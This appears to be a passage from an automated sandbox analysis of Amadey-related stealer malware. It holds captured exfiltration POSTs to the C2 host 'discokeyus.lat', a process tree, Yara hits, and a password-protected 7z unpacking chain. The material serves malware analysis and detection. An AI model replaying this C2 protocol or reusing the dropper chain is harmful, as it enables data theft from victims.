                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1980&rtt_var=748&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21492&delivery_rate=1457085&cwnd=157&unsent_bytes=0&cid=4bfb1d119d425b02&ts=956&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          57192.168.2.550286172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:54 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=6ZSRSNKIRLF8J
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 1355
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:54 UTC1355OUTData Raw: 2d 2d 36 5a 53 52 53 4e 4b 49 52 4c 46 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 5a 53 52 53 4e 4b 49 52 4c 46 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 5a 53 52 53 4e 4b 49 52 4c 46 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 36 5a 53 52 53 4e 4b 49 52 4c 46
                                                                                                                                                                                                                                                                          Data Ascii: --6ZSRSNKIRLF8JContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--6ZSRSNKIRLF8JContent-Disposition: form-data; name="pid"1--6ZSRSNKIRLF8JContent-Disposition: form-data; name="lid"PsFKDg--pablo--6ZSRSNKIRLF
                                                                                                                                                                                                                                                                          2024-12-21 00:16:54 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:54 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=onvg4nrslhvmfn53ntotk1if0n; expires=Tue, 15 Apr 2025 18:03:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5G202ydW6YZ%2BTg9ZcoiNunAqzOSdiRAuKp8AS9hUQeJhPHgKFEkJ6lSFVcZbB%2B7JIjgDgp4m7T6Zeht1xdEkkA3omz15VnUV3TBIXr2Aieg3dC3YeCTcWu8oswpXI5TU5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53afa2eb4ac3f5-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4204&recv_bytes=2265&delivery_rate=278892&cwnd=222&unsent_bytes=0&cid=b038a30da2a06244&ts=666&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          58192.168.2.550288172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:56 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=KH6LATDDPJ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 29525
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:56 UTC15331OUTData Raw: 2d 2d 4b 48 36 4c 41 54 44 44 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 48 36 4c 41 54 44 44 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 48 36 4c 41 54 44 44 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 48 36 4c 41 54 44 44 50 4a 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                                          Data Ascii: --KH6LATDDPJContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--KH6LATDDPJContent-Disposition: form-data; name="pid"1--KH6LATDDPJContent-Disposition: form-data; name="lid"PsFKDg--pablo--KH6LATDDPJContent-
                                                                                                                                                                                                                                                                          2024-12-21 00:16:56 UTC14194OUTData Raw: 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe 58 5d 72 1b 54 9a b4 da cf af 82 84 7b 17
                                                                                                                                                                                                                                                                          Data Ascii: |)PQKnm7>5OEK?6V,i<0egW\ro`#R\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_|x5mDom;z/o^R=ZHMyd01_1mX]rT{
                                                                                                                                                                                                                                                                          2024-12-21 00:16:57 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:56 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=olprqj1gpt4mduoooamj59bppj; expires=Tue, 15 Apr 2025 18:03:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=undAGX97k28hlRMtCM8g6DStIrJt575g61aKUOnCQ0m1vBBIYVbQOBYoAwuZxdZTLC3SE4pc4Zf53deIFvO%2BS8LahFJKLyjsyBqXKMFJT62T9BNpyrRK%2F7tzjilH2RMW%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53afb02c8dc326-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3802&min_rtt=1548&rtt_var=2078&sent=19&recv=32&lost=0&retrans=0&sent_bytes=2833&recv_bytes=30499&delivery_rate=1886304&cwnd=239&unsent_bytes=0&cid=443860efa0e6baa0&ts=942&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          59192.168.2.550291172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:58 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 82
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:58 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=80E12067200E3E98AC8923850305D13E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:59 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:58 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=p6eqjn27djg1nk794apgvka0u8; expires=Tue, 15 Apr 2025 18:03:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sI2dMrFH8kDzTQeoYsRj48edPhdIfRpWdwYXdGqVGclUcOVHTgUNjmnibDp7%2BcQWjuAc8wPKqU8Fu0hergANaKH2TxnpeYNCsbRwLgSiom%2Fhekxm8nrGFp%2F5Ii%2BSFm1mLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53afbe8882c3fa-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7507&min_rtt=1746&rtt_var=4240&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=980&delivery_rate=1672394&cwnd=186&unsent_bytes=0&cid=87a9689011db050c&ts=662&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:59 UTC214INData Raw: 64 30 0d 0a 71 35 79 72 44 67 34 68 57 42 6f 39 65 50 39 58 37 65 32 41 70 52 31 37 6e 45 6d 70 58 59 44 77 75 39 70 59 48 50 6f 63 69 42 6a 77 35 34 6c 37 4c 42 74 36 63 6b 6b 4d 6a 32 32 78 77 74 79 4b 4c 45 4f 70 5a 35 74 73 74 64 36 4b 36 32 73 79 79 79 72 55 4e 38 54 36 7a 56 49 68 52 54 31 38 45 78 32 48 4d 73 2f 42 6f 73 4e 70 57 61 5a 35 68 58 2f 6c 30 6f 48 71 4a 54 43 42 50 76 30 36 6b 62 37 44 65 6e 70 52 59 6b 59 53 4a 4e 42 6d 31 64 69 75 6c 79 78 4f 73 6e 69 59 62 71 37 42 6a 59 5a 33 62 34 35 35 36 58 58 33 73 39 6c 76 59 45 55 33 64 78 4d 64 68 7a 4c 50 77 61 4c 44 61 56 6d 6d 65 59 56 2f 35 64 4b 42 36 69 56 42 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: d0q5yrDg4hWBo9eP9X7e2ApR17nEmpXYDwu9pYHPociBjw54l7LBt6ckkMj22xwtyKLEOpZ5tstd6K62syyyrUN8T6zVIhRT18Ex2HMs/BosNpWaZ5hX/l0oHqJTCBPv06kb7DenpRYkYSJNBm1diulyxOsniYbq7BjYZ3b4556XX3s9lvYEU3dxMdhzLPwaLDaVmmeYV/5dKB6iVB
                                                                                                                                                                                                                                                                          2024-12-21 00:16:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:19:13:03
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x50000
                                                                                                                                                                                                                                                                          File size:2'992'640 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5C8CB972F2920BD6EDC98690F1634958
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2108909272.0000000004850000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:19:13:06
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:2'992'640 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5C8CB972F2920BD6EDC98690F1634958
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2150357431.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                          • Detection: 53%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:19:14:00
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                                                          File size:2'992'640 bytes
                                                                                                                                                                                                                                                                          MD5 hash:5C8CB972F2920BD6EDC98690F1634958
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2672749094.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:19:14:17
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          File size:4'438'776 bytes
                                                                                                                                                                                                                                                                          MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                          Start time:19:14:21
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7d62a0000
                                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:19:14:21
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:19:14:21
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:mode 65,10
                                                                                                                                                                                                                                                                          Imagebase:0x7ff68b110000
                                                                                                                                                                                                                                                                          File size:33'280 bytes
                                                                                                                                                                                                                                                                          MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:19:14:21
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:19:14:21
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                          Start time:19:14:22
                                                                                                                                                                                                                                                                          Start date:20/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                                                          Imagebase:0x660000
                                                                                                                                                                                                                                                                          File size:468'992 bytes
                                                                                                                                                                                                                                                                          MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

